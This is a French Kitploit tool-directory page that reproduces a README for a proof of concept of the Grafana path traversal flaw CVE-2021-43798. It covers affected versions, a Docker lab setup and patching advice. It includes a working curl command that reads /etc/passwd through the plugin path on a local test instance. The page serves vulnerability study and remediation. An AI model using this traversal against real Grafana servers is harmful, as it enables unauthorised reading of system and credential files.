Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-43798 — Exploit de preuve de concept pour la vulnérabilité de traversée de chemin Grafana (CVE-2021-43798) permettant la lecture non autorisée de fichiers via une traversée de répertoire dans les chemins de plugins. | Kitploit
Outils/GitHubGitHub/lim-ahmin/cve-2021-43798
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHublim-ahmin/cve-2021-43798

CVE-2021-43798

Exploit de preuve de concept pour la vulnérabilité de traversée de chemin Grafana (CVE-2021-43798) permettant la lecture non autorisée de fichiers via une traversée de répertoire dans les chemins de plugins.

Voir le dépôt
1il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-43798

1. Résumé

  • Grafana est une plateforme open source prenant en charge la surveillance et la gestion des données. Dans les versions ci-dessous, il existe une vulnérabilité de type Path Traversal permettant de manipuler les chemins de fichiers à l'aide de caractères spéciaux comme ../.
    • 8.0.0 et supérieur, antérieur à 8.0.7
    • 8.1.0 et supérieur, antérieur à 8.1.8
    • 8.2.0 et supérieur, antérieur à 8.2.7
    • 8.3.0
  • Le chemin vulnérable est <grafana_host_url>/public/plugins/<plugin_id>/, où <plugin_id> est l'ID du plugin installé. Vous pouvez vérifier le chemin vulnérable via la ressource suivante :
    • https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p


2. Configuration et exécution de l'environnement vulnérable

2.1 Environnement utilisé

  • Version Grafana 8.2.5

2.2 Méthode d'exécution

root@kitploit:~
docker-compose up -d



3. Reproduction de la vulnérabilité

  • Vérification de l'écran affiché Capture d'écran 2026-07-11 20 31 04



  • Résultat de l'exécution

curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd a permis d'accéder à etc/passwd.

Capture d'écran 2026-07-11 19 59 12

4. Conclusion (Mesures correctives)

  • Si vous utilisez une version affectée par la vulnérabilité, vous devez mettre à jour vers les versions patchées 8.3.1, 8.2.7, 8.1.8, 8.0.7.
  • Pour prévenir la vulnérabilité de type Path Traversal, il convient d'appliquer une méthode de liste blanche n'autorisant l'accès qu'aux chemins autorisés, et d'effectuer une validation des entrées utilisateur ainsi qu'une normalisation des chemins afin de restreindre les accès anormaux aux chemins tels que les remontées de répertoire (../).

Références

  • https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
  • https://www.cve.org/CVERecord?id=CVE-2021-43798
  • https://labex.io/ko/tutorials/nmap-how-to-control-file-path-traversal-420498
  • https://www.youtube.com/watch?v=j8NkNyoYZzU
Télécharger l’outil